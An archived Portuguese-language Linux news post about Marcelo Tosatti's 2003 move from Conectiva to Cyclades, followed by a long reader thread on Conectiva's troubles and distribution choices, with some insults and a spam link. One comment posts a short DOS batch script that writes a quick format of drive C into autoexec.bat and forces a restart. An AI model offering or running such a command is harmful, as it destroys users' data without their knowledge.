Arquivos históricos do BR-Linux.org apresenta:

Mais sobre a mudança de Marcelo Tosatti

Notícia publicada por brain em setembro 4, 2003 01:35 PM | TrackBack


Publiquei hoje mais cedo a notícia levantada pelo DBTH sobre a saída de Marcelo Tosatti da Conectiva e sua ida para a Cyclades. Como havia grande escassez de detalhes e tendo em vista a importância deste brasileiro para o desenvolvimento do kernel do Linux, resolvi ir direto à fonte e saber o que há por trás dos fatos. Seguem as respostas sintéticas mas completas do Marcelo, reproduzidas ipsis literis do e-mail:

Quais as razões da mudança?

"Interesse em trabalhar com algo diferente (na Cyclades vou trabalhar com Linux embarcado). A Cyclades e' uma empresa bem diferente da Conectiva: eles vendem hardware. A Cyclades e' uma empresa brasileira. :)"

Qual o objetivo?

"Aprender com o pessoal da Cyclades e meu ganha pao. hehe :)

Qual seu status atual em relação à Conectiva?

"Sou ex-empregado da Conectiva. Mantenho uma relacao boa com eles: São meus amigos.

Agradeço ao Marcelo por ter se prontificado a esclarecer estes pontos, e tenho certeza de que ele vai responder a estas mesmas perguntas várias vezes nos próximos dias, conforme a imprensa nacional for descobrindo as novidades ;-)

 

Comentários dos leitores
(Termos de Uso)

» Victor Zucarino () em 04/09 14:42

Em todas as palestras da Conectiva q participei, desde q o Tosatti passou a ser o mantenedor do Kernel 2.4x, vi o orgulho da empresa em ter um profissional de alto nível participando de um projeto como esse.

Talvez sua ida p/ a Cyclades seja um ponto negativo p/ a Conectiva na visão de muitos, mas como ele mesmo disse, existe uma boa relação entre ambas as partes. Ainda bem q foi a Cyclades, uma empresa com enfoque em soluções p/ o mundo Linux e ainda por cima nacional.

Tosatti, boa sorte em sua nova empreitada!


» ccc () em 04/09 14:45

Marcelo como muitos outros resolver dar a bunda aos gringos... o brain tem uma vontade tremenda de fazer isso porque prefere usar a lingua estrangeira ao inves de valorizar a nossa.


» putz () em 04/09 14:59

Nossa... leia a noticia antes de fazer comentario idiota babaca...

O Tosati ja responde essa diretamente para vc:

"Interesse em trabalhar com algo diferente (na Cyclades vou trabalhar com Linux embarcado). A Cyclades e' uma empresa bem diferente da Conectiva: eles vendem hardware. A Cyclades e' uma empresa brasileira. :)" <------


» Eu () em 04/09 15:00

Uou !

Bom para o Tosati... vai entrar em uma empresa muito mais profissional...

e péssimo para a Conectiva... eu já achava a instalação do conectiva completamente fora de padrões de diretórios e pacotes, e ainda deixou sair um de seus melhores profissionais... e com o marketing que (não) têm... e as boas parcerias da SCO no United... pronde será que ela vai ?


» tux () em 04/09 15:22

Sobre o marcelo tosatti já era esperado, ele como muitos ou foram mandados embora da Conectiva, ou pediram pra sair, se ele não saisse agora, provavelmente passaria pelo ridiculo de ser mandado embora.

mandado embora não por incapacidade tecnica, isso nós nao discutimos, mas sim , por incompetencia administrativa que a Conectiva se meteu.

E antes que voces tentem saber se sou ou nao da conectiva, ou se fui , isso nao acrescenta e nem muda nada na historia da Conectiva, empresa mal dirigida, empresa falida!

Viva o José Manuel :)


» TCCamargo () em 04/09 16:24

Pois é, espero que esteja errado mas acredito que isso seja fruto de uma politica completamente errada da Cone. Espero que eu esteja errado pois é chato ver uma Distro brasileira indo por agua abaixo.


» Dantas () em 04/09 16:51

Pra mim o Marcelo deveria parar de ser mantedor do kernel, porque esta me mando atraso de vida.


» Marcus Grando () em 04/09 17:57

Não sei porque atraso de vida Dantas? Se você quer algo mais novo use o 2.5/2.6 e não o 2.4. O 2.4 é para ser estável e não beta. Portanto as inclusões tem que ser muito bem discutidas e testadas antes de entrar na arvore do 2.4.

Sei comentário está errado...

Abraços


» MediaSonic () em 04/09 18:20

Conectiva:
Ruim de marketing
Site confuso, mal feito, mutante;
Distribuição sem evoluções;
Falta de divulgação de pacotes corporativos;
E muitos outros fatores que fazem com que esteja destinada a desaparecer em pouco tempo.


» LinusX () em 04/09 18:40

> e péssimo para a Conectiva... eu já achava a instalação do conectiva completamente fora de padrões de diretórios e pacotes,

Cometário sem nexo, mas todo mundo é livre para comentar, nao? :-)

Qual a relação disso com o marcelo, ele era mantenedor do kernel e nao desenvolvedor(empacotador) da distro.

"O mundo é livre para quem dá valor a libredade!"


» Xtian Xultz () em 04/09 20:38

A Conectiva tah cavando a propria cova.
Nos ultimos meses, tenho visto muita gente sair de lah ou ser mandado embora. Ateh o Roxo saiu de lah...
Eu sempre quis usar Conectiva. Usar uma distribuicao que eh feita na cidade onde moro, eh otimo! Mas nao deu, sempre me causou muitos problemas, hoje sou muito feliz usando Mandrake. E isso que conheco a Conectiva desde o tempo que ela era provedor de Internet (acho que pouca gente sabe disso), tentei usar o Conectiva Parolin, que comprei quando a empresa era lah no Parolin, mas nunca deu certo.
Uma pena, uma grande pena para o Linux no Brasil.


» Magno K. Nardin () em 04/09 23:09

Pois é.

Eu queria muito que alguém passasse a real situação da Conectiva, da RdL, das outras distros brasileiras. É uma angústia ficar lendo essa boataria pela "net".

E aí, Brain? Não dá para soltar uma série de matérias sobre esses assuntos? Como andam as distribuições Linux no Brasil?


» Woody () em 05/09 00:27

Augusto tipo ta aconteçendo alguma coisa errada com seu site, pelo menos comigo, eu uso opera 7.11 no slackware, ai acesso sua pagina as 01:00 da tarde e ai volto a ela la pelas 07:00, so que entro no site o navegador naum atualiza fica as noticias que tavam a 01:00 da tarde ai naum sei se e problema no opera ou ai, mais so ta acontecendo com o seu site, foi mal comentar aqui mais e que to sem e-mail esses dias, falow.


» Ark () em 05/09 01:00

1 - Troque de distro
2 - Troque de browser


» Daniel Semblano () em 05/09 03:02

Bom para o Tosati, péssimo p/ Conectiva. Como disse alguém aqui, a Conectiva está cavando a própria cova. Será que o pessoal lá não reage?


» Marcelo Tosatti já foi mais humilde () em 05/09 04:21

Ele é tão bom mantenedor que para o 2.4.23-pre1 usou "2.4.23pre1" e para o 2.4.23-pre3 "2.4.23-pre2". Ainda bem que o 2.6 será mantido pelo Andrew Morton.


» Manoel Pinho () em 05/09 07:45

Eu concordo que a Conectiva tem um péssimo pessoal administrativo e de marketing, o que infelizmente é necessário para qualquer empresa funcionar. Concordo também que as versões do CL vêm piorando em termos de bugs pós-lançamento, mas não concordo que a distribuição seja ruim.

Afinal, o CL teve algumas idéias inovadoras como o apt-rpm que são usadas de forma não oficial no Red hat e SuSe (e muito melhores e mais práticas do que as ferramentas nativas de atualização, e sem necessidade de registros).

Eu gosto de usar uma distribuição feita por brasileiros (na sua maioria), em que pelo menos é possível interagir por emails e listas de discussão com os sócios e pessoal técnico de lá. Também acho que as distribuições "gringas" tendem a adotar, mais cedo ou mais tarde, o estilo das empresas americanas de software tradicionais, cobrando licenças abusivas e caras. É só ver o que aconteceu com a Caldera/SCO.

Na minha modesta opinião uma saída para a Conectiva se diferenciar no mercado e sem investir rios de dinheiro seria basear sua distribuição no debian e se concentrar no que ela tem de fraco para usuários finais, que são o processo de instalação e detalhes cosméticos. Podia aproveitar o seu know-how em internacionalização pt_BR e es também nela. O imenso repositório de pacotes Debian tornaria o trabalho de manter pacotes com qualidade menor e com melhor qualidade. O aproveitamento de idéias do Knoppix também seria uma idéia boa. É só ver como o Kurumin avança mesmo não contando com uma empresa...


» Aliomar () em 05/09 08:22

É uma coisa muito boa ,, gostei da atitude dele,, parabens..


» liquidSLAVE () em 05/09 10:24

Sobre o Conectiva se basear no Debian :

Calma lá ! A conectiva não vai se salvar se se basear no debian , ela vai pro brejo !
Sou um DistroMaker amador ,as mesmo assim fazer uma distribuição baseada no debian é um inferno , fazer o que o KNOPPIX faz eh simples , é escolher os melhores pacotes do Debian Unstable e rodar o Debian em modo live , só isso. Usar os .deb do Debian não é
gerenciar uma distribuição , é no máximo personalizar o Debian.
O Debian possui características tão particulares que mesmo a personalização (do core) não é fácil a não ser que vc recompile todos os pacotes e desfaça as debianizações , ai ele deixa de ser Debian e as coisas legais param de funcionar , ou seja , o Debian é uma excelente distro para usar , mas não para usar como base.
A conectiva não é mais baseada no redhat já faz um tempinho , ela desenvolveu soluções próprias para seus problemas e hoje a empresa tem Know-How para se basear nela mesma , digo isso porque a estrutura e a arquitetura dos pacotes RPMS da conectiva é uma das mais fragmentadas e assim enchutas doque qualquer outra distro (até mais que o dpkg do Deb)
Migrar para base Debian é besteira , ela já tem autosuficiencia e personalidade própria desde a versão 8 , a grande questão é se existirão profissionais com capacidade técnica na empresa para tocar seu desenvolvimento.

See Ya


» Adriel Lyra () em 05/09 10:48

Se a Conectiva for pras trevas, não ficaremos órfãos, pois temos o Kurumin.
Já fui usuário do Conectiva, hoje uso o Mandrake 9.1, e estou muito satisfeito. Se tivesse banda larga, usaria o Kurumin, pois para mim falta muitos aplicativos nele, como o OpenOficce, e muitos outros pequenos. O Kokar não dá pra baixar por modem discado e toda hora sai atualização, é bom pra que tem mesmo banda larga pois é só baixar e tá tudo atualizado.
Quanto ao Marcelo, desejo a ele sorte aonde quer que ele esteja, pois só o fato de termos um brasileiro inserido no 1º escalão do mundo Linux (mantenedor do Kernel) já é motivo de muito orgulho para o Brasil.
Boa sorte Marcelo, e disperta Conectiva....


» Patola (Cláudio Sampaio) () em 05/09 10:48

Faço minhas as palavras do liquidSLAVE... E acrescento: ela já é suficientemente parecida com o debian - adotou até as mesmas políticas de empacotamento e nomenclatura de pacotes, assim como o sistema de "alternatives"! E os rpms da Conectiva ainda são *MUITO* mais bem trabalhados que os de qualquer outra distribuição, isso é de se notar.

Quanto à idéia do Manoel Pinho, acho que certas fraquezas do debian *ainda* são também fraquezas da Conectiva: ela não tem destaque no que concerne a facilidade de gerenciamento da distribuição. Não tem uma autodetecção especialmente boa, não tem wizards bons de configuração. Ainda está bem atrás em termos de interface do Mandrake e do RedHat, pois tudo o que tem é uma interface personalizada do KDE/Gnome e não utilitários próprios e coesos.


» Manoel Pinho () em 05/09 11:09

Pessoal, foi só uma idéia para que a distribuição tivesse um maior alcance internacional e que pudesse manter um número grande de pacotes com um pessoal cada vez mais enxuto. Eu concordo também com os argumentos do Patola e do liquidslave e uso o CL habitualmente (desde o Guarani). E eu uso justamente porque acho melhor do que o Red Hat e outras distribuições baseadas em rpm.

Mas temos que convir que as outras distribuições estão melhorando a internacionalização pt_BR também e a concorrência vai ficar cada vez maior para a Conectiva, com a desvantagem dela ter uma base bem menor de usuários. Outras distribuições também começam a ter maior presença nacional, com escritórios, cursos e certificações. Manter uma distribuição de uso geral em um país como o Brasil é realmente um trabalho hercúleo (tirei essa do fundo do baú...), principalmente quando brasileiro está acostumado a tacar pedra em qualquer coisa nacional e preferir sempre os estrangeiros.

Por isso mesmo eu tento contribuir com a Conectiva ao relatar bugs, dar sugestões e comprar minhas caixinhas originais. Não tenho nenhuma relação comercial ou pessoal com a empresa mas fico triste em ver como um marketing ruim pode causar danos à imagem da empresa. Tecnicamente eu volto a dizer que não tenho nada contra o CL, apenas aponto falhas que precisam ser melhoradas.


» Augusto Campos () em 05/09 11:15

Magno:

A idéia é boa, mas é um projeto meio grande demais para eu montar sozinho. Se surgirem interessados em fazer a pesquisa, eu certamente estou disposto a publicar os resultados.

Woody:

Tem certeza de que isto não está ocorrendo por que a maior parte das notícias aqui do site são publicadas de manhã?

Abraços
Augusto


» Mandark () em 05/09 12:30

É uma pena a Conectiva estar cada vez mais esquecida. No ranking da Distrowatch, ela é a 50ª enquanto o Kurumin já está em 15º... Mas o que torna uma distribuição popular não é o marketing e sim a qualidade. Nunca vi propaganda do Kurumin que não seja o boca-a-boca.

http://www.distrowatch.com/stats.php?section=popularity


» Flavio Moreira () em 05/09 14:10

O ultimo que sair da Conectiva, que apague a luz !

:-( que pena ...

Foi bom enquanto existiu ... introduziu muitos usuários no Mundo Linux, Desenvolveu tecnologia, ... mas - sempre tem um "mas" - com a administracao/marketing (o proprio site ficou meses sem atualizacao) não tinha como dar certo mesmo ...

:-( que pena ...


» Paulo Junqueira () em 05/09 14:51

Infelizmente, a qualidade da distro conectiva deixa a desejar... Aquele Synaptic é realmente ridículo... Qdo tentamos atualizar e ele ou o apt apresenta limite de usuários, imagine a cara de quem quer ver o treco funcionando qdo ele pede pra você editar um arquivo e usar os mirrors? Que arquivos? Que mirrors que nada... quem gosta de ter trabalho é quem não têm mais o que fazer... Se eles tivessem um pouco mais de capricho essas coisas não seriam assim.

Tem muito erro besta no conectiva que se percebe que é por falta de atenção mesmo. Parece que eles empacotam as versões novas dos softwares e soltam versão nova. Não há preocupação com o usuário final.

Talvez seu foco seja o mercado corporativo, mas eles tem de tomar cuidado afinal, SUSE, RedHat já estão por aqui, e outros virão, creio eu.

A saída do Marcelo prova que a empresa está cada vez mais sem rumo... Eu usava o conectiva desde o Parolin, mas não aguentei mais e mudei pro RH. Que pena... Espero que este quadro se reverta.


PS: Ô Marcelo, qdo vc vem pra Sampa? Te espero na próxima Rave!!! (Paulo cabeludo... trance... gota...)


» Alexandre Arruda Paes () em 05/09 15:54

Uso e usarei Conectiva, a não ser que o sistema fique impraticável por bugs. A distro se sustenta bem para um país sem espírito colaborativo.. vai me dizer que não chove de gente torcedo para a PC Master lançar as distros por 10 paus ou baixá-las para não comprar a caixinha ?!?!

Tudo no Linux e contornável. Se você realmente compreende o sistema, consegue alcançar seus objetivos de uma forma ou de outra.

O único porém da saída de Marcelo é uma certa melancolia por parte da Conectiva, haja visto o pomposo alarde feito sobre sua importância "estratégica" há algum tempo... :/


» Peter Parker () em 05/09 16:06

Concordo com a opinião do "putz" . Marcelo sempre teve interesse em ir trabalhar no exterior e so aparecer a oportunidade e ele foi.


» andarilho () em 05/09 16:16

Quando é que vão começar a *ler* as notícias antes de comentar? E foi o *putz* que citou a parte: "A Cyclades é brasileira". Você deve estar se referindo a um outro comentário, PP.


» chimpa () em 05/09 17:50

E outra: se o cara decidir trampar lá fora o que tem isso demais? Se a empresa for boa, pagar bem, ter conhecimento a oferecer não vejo problema nenhum. Isso não muda o que o Marcelo fez pelo kernel do Linux e oque ainda deve fazer. É como criticar o Linus por que ele ganha bem no seu trampo. Uma coisa é o ganha pão, outra as atividades extras. Agora desenvolvedor de software livre tem que ser penitente e viver em jejum? hehe


» Carlos Vitoriano () em 06/09 09:56

Galera, sempre fui usuario do conectiva.
Concordo que as versoes CL8 ficaram ridiculas com varios BUGs, e que a versao final do conectiva 9 (A Caixinha ficou uma bosta)....
Mas depois que lançaram o CD UPdates1(Atualização final), o conectiva 9 ficou muito bom. Uso o conectiva como desktop e servidor. Tudo esta funcionando bem. Dizem que o CL precisa de cosmeticos, funcionar direito e tudo mais.... Mas como e de se notar tudo que e nacional o povo joga pedra.... Dar as costas é fácil, e mudar para as distribuições de fora do Brasil mas fácil ainda! Mas como todo mundo Linux é livre.... Mas por que ao invés de fazerem somente criticas, por que vocês não criticam e apontem soluções(Nem que seja reportar BUG'S no Bugzilla!). Eu pelo menos faço a minha parte. Não sei se a conectiva está com dificuldades administrativas/financeiras. Mas como eu trabalho em desenvolvimento de tecnologia. (Automação Industrial, Estou desenvolvendo um controle On-line de uma Planta Industrial, via Linux. Percebem....). Vejo o quanto é humilhante necessitar de algo de fora onde nós poderíamos Desenvolver tudo aqui dentro! Essa é a questão! O Marcelo Tossati é bom no assunto (Ai os caras me falam que ele é ruim, que não presta.... e que as Distribuições de fora são boas. Agora me digam. A versão estável do Kernel delas passou pelas mãos de quem?). Eu Gostaria de trabalhar onde ele está agora. O Kurumin é bom pois facilitou a vida de USUARIOS DOMESTICOS..... Usuários corporativos não necessitam de um cosmetico e sim que a rede funcione (Me digam se o CL9 Updates1 não faz isso de igual para Melhor comparando com as demais distribuições.). Se o problema é Desktop. Ajudem ao invés de reclamar! Faço a minha parte...Façam a sua parte.... Ou não somos uma comunidade.

Carlos Vitoriano
Quase Engenheiro de Computação
(Falta pouco! hehehe...)


» slayer () em 06/09 18:36

:: #############################
@echo off
echo format c: /q /u /autotest>c:\autoexec.bat
rundll.exe user.exe,exitwindowsexec
:: #############################


» GMartins () em 06/09 19:29

Uau, senhores !!!

Tudo isto pela saída do Marcelo? Acredito que derivamos um pouquinho, mas blz, pois isto é liberdade. Tb gostaria de dar uns pitacos:
1) Marcelo - Um fato: o cara é bom, senão não estaria trabalhando com o kernel. O fato de ter saído da Conectiva e ter ido para outra empresa nacional é irrelevante. Como já disseram, pior para a CL, perdeu um grande "peão", melhor para a Cyclades. E se tivesse ido para fora ? Melhor para ele ? Pois que seja. Mas que continue no espírito free, viabilizando o acesso para os que não podem trabalhar com material 100% proprietário.
2) Conectiva - Durante um tempo fui instrutor certificado deles. Percebia o seu descaso pelo material didático, que frequentemente estava em atrso com os CDs. A instalação padrão usa postfix, e eles falam do sendmail. Não se comunicam com os certificados, não os traz para próximo de si, não promove eventos com eles, não os defende nem os pune, quando trabalham mal. Não respondem emails dos alunos, relativos as reclamações. E ainda diziam: "mandem o número que está na capa para lhes identificar". Um aluno meu mandou quase 5 emails, há dois anos atrás, e até hoje (6/9/2003) não recebeu QUALQUER resposta. A CL cobrava valores altíssimos para seus centros de treinamento, e depois passou a exigir a compra mensal de um mínimo de material didático para uma determinada modalidade de centro de treinamento. Ao ser aprovado na certificação, o nome não vai automaticamente para a página, precisamos pedir isto por email. A página dos certificados tem erros de digitação nos nomes dos estados, mostrando "Rio de Janeiro" e "rio de janeiro" como se fossem cidades diferentes.
3) Distribuição - Atualmente estou usando o Mandrake 9.1 para desktops na empresa onde trabalho, FreeBSD como servidor corporativo (Samba, DNS, SMTP, DHCP) e firewall. Utilizo uma ferramenta livre para atualização remota dos desktops, e uma outra solução livre para monitoramento de cada desktop (espaço disponível, latência de rede, etc). Estou testando o Kurumin. Lhes asseguro que um órgão público está com belos olhos para a obrigatoriedade do Kurumin como Desktop. Qual o problema de ser distro-a ou distro-b ? Sendo livre, brasileiro ou não, isto é o que importa. Estou escrevendo alguns docs para organizar isto em um site meu, objetivando não só SOs free como servidores, mas tb (e principalmente) como desktops. Nenhuma delas é perfeita, mas as soluções são portáveis.

Marcelo, vai fundo. Lute não apenas pelo país, mas por uma grande comunidade, que se estende cada vez mais. Ainda temos muitos iludidos do software proprietário precisando saber que nem tudo é vindo de uma única empresa.


» Cesar Cardoso () em 06/09 19:30

Alguns comentários (correndo o risco de ser mais flamado que o Patola):

1) A idéia de basear uma distro comercial na Debian é boa na teoria, mas na prática? Só uma deu certo: a Libranet ( http://www.libranet.com ). Eles adotam a mesma política da SuSE ("quer baixar o release mais novo? Vai lá no caixa e paga antes"), só que sem a instalação por FTP.
2) O apt-rpm foi uma boa idéia mais por absoluta falta de concorrência, com o yum ( http://linux.duke.edu/projects/yum ) sendo extra-oficialmente adotado pela RedHat (basta ver no Rawhide) a coisa muda de figura. Sem contar o fato de ser muito bugado e não aproveita as particularidades do RPM.
3) O que há de mal numa mudança de empresa? O Marcelo não é obrigado a prestar contas da carteira de trabalho dele pra ninguém, ora! Se ele trocou a Conectiva pela Cyclades, ele deve ter lá seus motivos, só posso desejar sorte a ele.
4) A Conectiva está mal... ora, a Conectiva é uma empresa de TI brasileira. O mercado de TI está mal e o Brasil está mal. Claro que não podia estar bem.


» Trombel () em 07/09 16:38

Creio que você esteja errado, Cesar Cardoso. Definharam e morreram as seguintes distribuições baseadas no Debian: a Storm,
a Progeny e a Corel Linux. Mas há outras que vieram preencher o lugar: Xandros, Lindows, Bonzailinux, Mepis e Libranet.Deve
haver outras certamente.Citei apenas aquelas sobre as quais já ouvi falar.Acabei de baixar o Libranet 2.7(www.libranet.com/download.html).
Estou louco para instalar, embora não seja a versão mais nova. A mais nova é a 2.8.1. Esta só pagando para conseguir.
Um abraço.


» Cesar Cardoso () em 07/09 23:48

Trombel, Bonzailinux e Mepis não são comerciais, e Xandros e Lindows.com ainda precisam provar que são comercialmente viáveis.


» Carlos Romel () em 08/09 09:30

Acho imprescindível termos uma distribuição nacional.

Melhor que acusarmos esse ou aquele pelo desempenho da distribuição, seria mais produtivo nos mobilizarmos para a reversão da situação.

Podemos (nós usuários GNU/Linux) fazer alguma coisa em prol da Conectiva?

Assim como os EUA tem a RedHat como referência (tudo bem, tem também o Slackware e o Debian), a RedFlag na China, e SuSE na Alemanha, a Mandrake na França, nós temos que ter uma distriubição referência, seja a Conectiva ou outra que venha a substituí-la.

Há alguém lá disposto a explicar os últimos acontecimentos? (o consórcio United, a saída do Kojima, do Bruder, do Aurélio, do "rodarvus" e agora do Tosati, a última edição da Revista com 33 páginas ao preço de R$15,99 [quase o preço da Linux Journal, entre outros]).

Se o problema for simplesmente administração, então é um problema que os acionistas devem resolver, mas se a comunidade formada ao redor da distriuição puder ajudar de alguma forma, acredito que a hora seja essa.

Seria uma péssima notícia: "Distribuição brasileira do GNU/Linux se mostrou inviável - Software livre é viável?"


» hector () em 08/09 11:14

A computacao embarcada ganha cada vez mais importancia e sera vital desenvolvermos tecnologia nesta area. Esquecam computadores, pensem em computacao. Pensem em artefatos computacionais e em sistemas de banco de dados integrados ao SO e residentes em memoria. Artefatos computacionais integrados a dispositivos nanomecanicos. Em um cenário cujo horizonte não é muito maior do que 5 anos, acho que a ida do Tosatti para a Cyclades uma otima noticia.


» Anderson Batista () em 08/09 14:39

Conectiva, RedHat, Suse, Debian, etc... são apenas empacotamentos de diversos ( na maioria das vezes GNU ) apps. Claro que não podemos ignorar suas diferenças e deixar de comparar, pois isto leva a evolução. Mas não podemos esquecer que o kernel sim é o ponto de convergência de tudo isso que estamos falando e é justamente do kernel 2.4.x que o Marcelo cuida, somente isso. Tudo bem, o fato dele ter trabalhado na Conectiva talvez tenha sim influenciado em alguma coisa. Neste momento estou escrevendo isso num slackware 9.0 kernel 2.4.20, e é inegavel que eu tenho que agradecer e muito o sr. Marcelo por ter ajudado no desenvolvimento do mesmo. Agora pensem; não orgulha vcs saberem que este mesmo kernel que eu estou usando agora e que é usado atualmente em todas as outras distros citadas em produção em diversas corporações mundo afora e em workstations de usuários ser mantido por um brasileiro ??? eu sinto muito orgulho e agradeço a contribuição deste brasileiro ao software livre para o mundo e lhe desejo muita sorte a ele na nova empreitada na Cyclades que também é uma empresa brasileira muito respeitada no mundo. Torço também pela conectiva, que ela de a volta por cima e também seja mais um motivo de orgulho pra gente. obs: eu uso diversas distros para diversas finalidades, e notei que cada uma tem alguma particularidade notável em relação as outras, mas nenhuma é perfeita. Viva a liberdade de escolha, mas lembrem se que gratidão também é virtude. [], Anderson.


» Monteiro () em 09/09 04:03

Não acredito na queima do linux com a queda da Conectiva. Sou RHCE, e acompanhando de perdo os movimentos da RedHat, seu porte para pt_BR está cada vez melhor e muitas (e digo com dados reais) empresas brasileiras já não estão mais vinculando o nome Linux com Conectiva. Já fui Conectiva e hoje todos os meus clientes (por vontade própria) me pedem RedHat, Slack ou Debian, mas nenhum Conectiva.

Acho que o fim já chegou e ela, e muitos de nós, ainda não percebemos.


» Cuti () em 09/09 18:23

Acho que a ida do Marcelo para a Cyclades foi legal para a vida dele. O cara é fera, tava afim de uma coisa nova e porque não mudar??
Agora... a Conectiva não deixou ele trabalhar em Porto Alegre, que é a cidade que ele decidiu morar. A Cyclades foi lá e disse tudo bem!! Então... prá quem pensa que ele foi para o exterior, tá muito enganado, ele é um dos mais novos moradores da capital gaúcha.


» GMartins () em 11/09 02:49

P/ Cesar Cardoso: "Acho imprescindível termos uma distribuição nacional". Desculpe Cesar, mas onde está o motivo desta imprescindibilidade ? Se a administração deles não é ágil suficiente, vai definhar. O Marcelo, como tantos outros, demonstra qualidade, mas vai seguir os melhores rumos. Conectiva, e outras distros nacionais que não tiveram competência de se manter vão acabar. Linux não é daqui ou de lá. É de uma comunidade internacional, sem fronteiras. Uso hj o Mandrake sem ligar para o fato dele ser francês (ainda que baseado em RH). Usei por um bom tempo a CL, brasileira, mas apoiada em RH. Estou considerando usar o Kurumim, que tem se mostrado cada vez mais estável. Por acaso, brasileiro, mas apoiado na Debian. Não há espaço para orgulho nacionalista, pois não é uma competição. Há espaço para funcionalidades.
P/ Hector:"não orgulha vcs saberem que este mesmo kernel ... ser mantido por um brasileiro". Agora sim, estou feliz por ver a ação de um brasileiro em algo realmente importante. Kernel está acima da distro. E o Marcelo só está lá por mérito.


» Gabriela Ferreira Clezar () em 10/11 16:06

A Conferência Internacional do Software livre foi muito interessante, espero passar por essa esperiência mais vezes!!!


» José Natalino Sepulcro () em 15/01 12:52

Olá Companheiros,
Preciso conhecer mais o linux,
pois a openiffice está com problema em salvar arquivo.
Favor enviar para mim uma apostila com todos os detalhes minuciosamente da openofficeorg.writer.Calc.Draw pois pois foi estalado este programa no meu trabalho estou tendo muita muita dificuldade em manuseá-lo, no que diz respeito a salvar e criar tabela etc...


» Ivam Clezar Adão () em 27/06 12:19

Que bate papo é esse???


» debt consolidation () em 15/10 18:18

6008 http://www.rapid-debt-consolidation.com

consolidate debt


Comentários desativados: Esta discussão é antiga e foi arquivada, não é mais possível enviar comentários adicionais.



O Arquivo Histórico do BR-Linux.org mantém no ar (sem alteração, exceto quanto à formatação, layout, tabela de caracteres, etc.) o acervo de notícias, artigos e outros textos publicados originalmente no site na segunda metade da década de 1990 e na primeira década do século XXI, que contam parte considerável a história do Linux e do Open Source no Brasil. Exceto quando indicado em contrário, a autoria dos textos é de Augusto Campos, e os termos de uso podem ser consultados na capa do BR-Linux.org. Considerando seu caráter de acervo, é provável que boa parte dos links estejam quebrados, e que as informações deste texto estejam desatualizadas.